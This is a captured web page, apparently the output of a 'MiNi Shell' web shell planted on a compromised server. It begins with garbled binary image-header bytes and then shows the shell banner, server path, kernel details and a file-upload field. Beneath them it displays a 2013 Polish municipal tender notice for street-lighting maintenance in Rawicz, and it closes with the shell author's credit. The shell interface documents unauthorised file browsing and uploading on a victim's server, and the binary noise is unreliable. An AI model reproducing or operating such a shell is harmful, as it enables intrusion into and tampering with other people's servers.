JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131127/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131127/253955-N-2013.html

<p class="kh_header"><b>Rawicz: Konserwacja oświetlenia ulicznego stanowiącego własność Gminy Rawicz</b><br>
<b>Numer ogłoszenia: 253955 - 2013; data zamieszczenia: 27.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Gminy Rawicz działający w imieniu Gminy Rawicz , ul. Piłsudskiego 21, 63-900 Rawicz, woj. wielkopolskie, tel. 065 5465400, faks 065 5464167.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rawicz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Konserwacja oświetlenia ulicznego stanowiącego własność Gminy Rawicz.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest świadczenie usług w zakresie konserwacji oświetlenia ulicznego na terenie miasta i gminy Rawicz w latach 2014 i 2015. Konserwacja obejmuje całe oświetlenie uliczne stanowiące  własność Gminy  Rawicz.  
Wykonawca będzie zobowiązany również do utrzymania i konserwacji oświetlenia iluminacyjnego rawickiego ratusza,  oświetlenia trzech innych obiektów  jak również do montażu oświetlenia świątecznego o zakresie podanym w załączonym do SIWZ - przedmiarze wraz z kosztorysem zerowym (załącznik nr 6).   
Wykaz oświetlenia ulicznego  stanowiącego własność Gminy Rawicz stanowi załącznik nr 5 do SIWZ i może ulec w trakcie realizacji umowy zmianom (budowa  nowych linii oświetleniowych, przekazanie dróg ).   
Konserwacja oświetlenia ulicznego ma na celu zapewnienie utrzymania sprawności technicznej punktów oświetlenia ulicznego. Wobec tego Wykonawca wybrany w drodze przetargu będzie odpowiedzialny za stan techniczny i bezpieczne funkcjonowanie wszystkich urządzeń oświetleniowych. 

2.	  Szczegółowy zakres przewidywanych usług  konserwacyjnych  wykonywanych w razie potrzeby na zlecenie Zamawiającego obejmuje: wymiana źródeł  światła w tym: a) o mocy  70  W - 65 sztuk, b) o mocy 100 W -70 sztuk,   
c) o mocy 150 W -70 sztuk,  d) o mocy 250 W - 40 sztuk , wymiana uszkodzonych elementów oprawy (bez źródła światła) -50 sztuk, wymiana przepalonych bezpieczników -90 sztuk, wymiana odcinka kabla - 40 mb,  wymiana odcinka napowietrznej linii - 50 mb,  wymiana stycznika - 30 sztuk, wymiana przekaźnika zmierzchowego - 20 sztuk, regulacja zegara sterującego - 20 sztuk, wymiana źródeł  światła na ratuszu i obiektach sakralnych  w tym:  (pełne nazwy i symbole podano w załączniku nr 5 do SIWZ) a) PD 270 ze statecznikiem - 10 szt. , b) 150 W, THORN - 10 sztuk,  c) 250 W SONPACK THORN - 5 sztuk,  d)  PRT 35 THORN 1000W - 5 sztuk, e)    PD-2H-A150, HIT-DE 150W - 10 sztuk,  f)  PD-2N/H-A250  HIT 250 W - 10 sztuk,  g) CDM-T 35 W - 5 sztuk,  h)  35 W - 5 sztuk,  i) 150 CDM-T - 5 sztuk,  montaż oświetlenia świątecznego  (w/g  przedmiaru  - zał. nr 6 do SIWZ), mycie opraw  - 100 sztuk. 

3.	  Ilości podane wyżej są ilościami przewidywanymi i ze względu na specyfikę zamówienia (bieżąca konserwacja i usuwanie awarii oświetlenia) mogą w trakcie realizacji zamówienia ulec zmianie. 
Konieczne prace do wykonania będą ustalane na bieżąco i przekazywane Wykonawcy pisemnie (mail) lub telefonicznie.  
 
4.	 Wszelkie  niezbędne materiały, sprzęt oraz odpowiednio wykwalifikowany personel  służący do likwidacji  powstałych awarii i innych nieprawidłowości w funkcjonowaniu  oświetlenia zapewnia Wykonawca w ramach zaoferowanej ceny. 

 
5.	Wykonawca przy realizacji zamówienia będzie  zobowiązany do:

1)	stosowania wyrobów budowlanych wprowadzonych do obrotu na zasadach określonych w ustawie z dnia 16.04. 2004 roku 
o wyrobach budowlanych (Dz. U. Nr 92 poz. 881 z późniejszymi  zm.), faktycznie nowych i posiadających  wymagane atesty 
i certyfikaty;
2)	zgłoszenie do odpowiednich służb energetycznych oraz ponoszenie kosztów włączenia i wyłączenia obwodu oraz koszty dopuszczenia do prac,  jak również  załatwienie wszelkich  niezbędnych uzgodnień i formalności związanych z przedmiotem zamówienia; 
3)	zapewnienia całodobowego dyżuru  umożliwiającego zgłaszanie awarii oświetlenia ulicznego stanowiącego bezpośrednie zagrożenie dla życia i zdrowia  na wskazany numer telefonu  ( pozostałe awarie Zamawiający będzie zgłaszał  telefonicznie 
a następnie potwierdzał pisemnie za pomocą faksu lub drogą elektroniczna);    
4)	usuwania awarii zagrażających życie i zdrowie w terminie odwrotnym, natomiast w pozostałych przypadkach usuwanie awarii 
w sieci oświetleniowej (licząc od momentu zgłoszenia) :
a) w linii kablowej				- do 7 dni roboczych,
b) w linii napowietrznej			- do 4 dni roboczych,
c) wymiana przepalonych źródeł światła		- do 5 dni roboczych,
d) inne zgłoszone usługi 			- do 5 dni roboczych,
    
5)	posiadania  zezwolenie na prowadzenie działalności w zakresie zbierania i transportu odpadów niebezpiecznych w postaci lamp oświetleniowych  lub umowę z firmą posiadającą ważne takie zezwolenie.   

6)	ponoszenie kosztów opłat za zajęcie pasa drogowego dla wykonania prac związanych z przedmiotem zamówienia (jeżeli będzie taka potrzeba); 

7)	oznakowanie terenu  podczas wykonywania prac zgodnie z obowiązującymi w tym zakresie przepisami oraz ponoszenia kosztów związanych ze zmianą organizacji ruchu;     

8)	obsługa  geodezyjna podczas realizacji zamówienia ( w razie potrzeby),  

9)	zorganizowanie i przeprowadzenie niezbędnych prób, pomiarów, badań i odbiorów oraz wykonanie dokumentacji powykonawczej,

10)	prowadzenie wykazu  prac konserwacyjnych wykonanych w danym okresie rozliczeniowym  z podaniem  adresu - lokalizacji, daty naprawy, rodzaju wykonanych prac itd.   

11)	ubezpieczenie budowy i robót z tytułu szkód, które mogą zaistnieć w związku z  określonymi zdarzeniami  losowymi oraz od odpowiedzialności cywilnej,  ponoszenia kosztów szkód wynikłych w czasie wykonywania robót jak również za odpowiedzialność za wszelkie zdarzenia powstałe z tej przyczyny;

12)	organizacji i zagospodarowania placu budowy oraz zaplecza budowy, ustanowienie  osoby z odpowiednimi kwalifikacjami i odpowiedzialnym za przedmiot zamówienia  oraz w razie potrzeby wykonanie planu bezpieczeństwa i ochrony zdrowia, zgodnie  z Rozporządzeniem Ministra Infrastruktury  z dnia 23.06. 2003 r. w sprawie informacji dotyczącej bezpieczeństwa i ochrony zdrowia oraz planu bezpieczeństwa i ochrony zdrowia  (Dz. U.  Nr 120 poz. 1126)  

13)	odtworzenie i przywrócenie do stanu pierwotnego utwardzeń terenu i zieleni,

14)	 po zakończeniu robót doprowadzenie terenu budowy do stanu pierwotnego, demontaż obiektów tymczasowych  oraz  uporządkowanie całego terenu zajętego na prowadzenie robót,

15)	udzielenia gwarancji : 12 miesięcy na wymianę źródła światła i naprawę oprawy  oraz 24 miesiące na wymianę oprawy.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>ZAMAWIAJĄCY przewiduje udzielenie zamówień uzupełniających na podstawie art. 67 ust.1 pkt  6  ustawy, stanowiących  nie więcej niż  50 % wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień,  
w okresie 3 lat od udzielenia zamówienia podstawowego</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 50.23.21.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W prowadzonym postępowaniu Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocena spełnienia powyższego warunku dokonana będzie na zasadzie spełnia / nie spełnia na podstawie załączonego do oferty Oświadczenia Wykonawcy 
(załącznik nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocena spełnienia powyższego warunku dokonana będzie na zasadzie spełnia / nie spełnia na podstawie załączonego do oferty Oświadczenia Wykonawcy 
(załącznik nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocena spełnienia powyższego warunku dokonana będzie na zasadzie spełnia / nie spełnia na podstawie załączonego do oferty Oświadczenia Wykonawcy 
(załącznik nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocena spełnienia powyższego warunku dokonana będzie na zasadzie spełnia / nie spełnia na podstawie załączonego do oferty Oświadczenia Wykonawcy 
(załącznik nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocena spełnienia powyższego warunku dokonana będzie na zasadzie spełnia / nie spełnia na podstawie załączonego do oferty Oświadczenia Wykonawcy 
(załącznik nr 2 do SIWZ).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	Wypełniona i podpisana przez Wykonawcę oferta przetargowa (załącznik nr 1 do SIWZ).
2)	KOSZTORYS OFERTOWY  (dot. oświetlenia świątecznego) w wersji papierowej opracowany przez WYKONAWCĘ  metodą kalkulacji szczegółowej  w oparciu o załączony przedmiar i kosztorys zerowy. 
3)	Oryginał pełnomocnictwa do reprezentowania ( o ile ofertę składa pełnomocnik)  lub kopia pełnomocnictwa poświadczona przez notariusza.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza - jeżeli uzna za uzasadnione - możliwość zmiany ustaleń zawartej umowy w stosunku do treści oferty Wykonawcy o których mowa w art. 144 ustawy PZP w następujących przypadkach :

1)	potrzeby wykonania usług  zamiennych,zmiany ilości zamawianych usług  lub odstąpienia od realizacji części usług, i związanej z tym zmiany wynagrodzenia na wniosek Zamawiającego lub Wykonawcy,
2)	na uzasadniony wniosek Wykonawcy zaakceptowany przez Zamawiającego i pod warunkiem, że zmiana ta wynika z okoliczności których Wykonawca nie mógł  przewidzieć  na etapie składania oferty i nie jest przez niego zawiniona, 
3)	zmiany urzędowej wysokości stawki podatku VAT, 
4)	wystąpienia zdarzeń wymuszających przerwę w realizacji zamówienia niezależnych od Wykonawcy,  
5)	wprowadzenie lub zmiana zgłoszonych w ofercie części robót wykonywanych przy udziale Podwykonawcy, za uprzednią zgodą Zamawiającego, 
6)	zmiany  terminu realizacji zamówienia, 
7)	przekształcenie którejkolwiek ze stron umowy,
8)	zmiany personelu Wykonawcy i Zamawiającego, za uprzednią zgodą Zamawiającego (np. osoby odpowiedzialne za  realizację zamówienia itp.)
9)	warunków płatności z zastrzeżeniem, że zmiana ta będzie korzystna i niezbędna dla Zamawiającego,
10)	innych niezbędnych zmian pod warunkiem, że są korzystne dla Zamawiającego.


W przypadku wystąpienia okoliczności, o których mowa wyżej,  Zamawiającemu przysługuje prawo do zmiany ustaleń zawartej umowy w zakresie, który uzna za uzasadniony.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rawicz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie Zamawiającego - w Urzędzie Miejskim Gminy Rawicz, ul. Piłsudskiego 21, 63-900 Rawicz, pokój 111 - po wpłaceniu należności w kasie Urzędu lub za zaliczeniem pocztowym.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.12.2013 godzina 10:00, miejsce: w siedzibie Zamawiającego - sekretariacie Urzędu Miejskiego Gminy Rawicz, 63-900 Rawicz, ul. Piłsudskiego 21 pokój 6.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Zamówienie nie jest finansowe ze środków Unii Europejskiej. 2. Wszelkie oświadczenia, wnioski, zawiadomienia, wezwania oraz inne informacje i dokumenty w postępowaniu o udzielenie zamówienia ZAMAWIAJĄCY i WYKONAWCY przekazują pisemnie. 3. ZAMAWIAJĄCY dopuszcza również możliwość porozumiewania się OBU STRON (Wykonawca, Zamawiający) za pomocą: faksu 65 546-41-67 oraz poczty elektronicznej przetargi@rawicz.pl 4. Jeżeli ZAMAWIAJĄCY lub WYKONAWCA przekaże faksem lub pocztą elektroniczną dokumenty lub informacje, o których mowa wyżej, każda ze stron na żądanie drugiej niezwłocznie potwierdzi fakt ich otrzymania. 5. Zamawiający nie przewiduje zawarcia umowy ramowej. 6. Zamawiający nie zamierza ustanowić dynamicznego systemu zakupów. 7. Zamawiający nie przewiduje określania w opisie przedmiotu zamówienia wymagań związanych z realizacją zamówienia o których mowa w art. 29 ust. 4.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com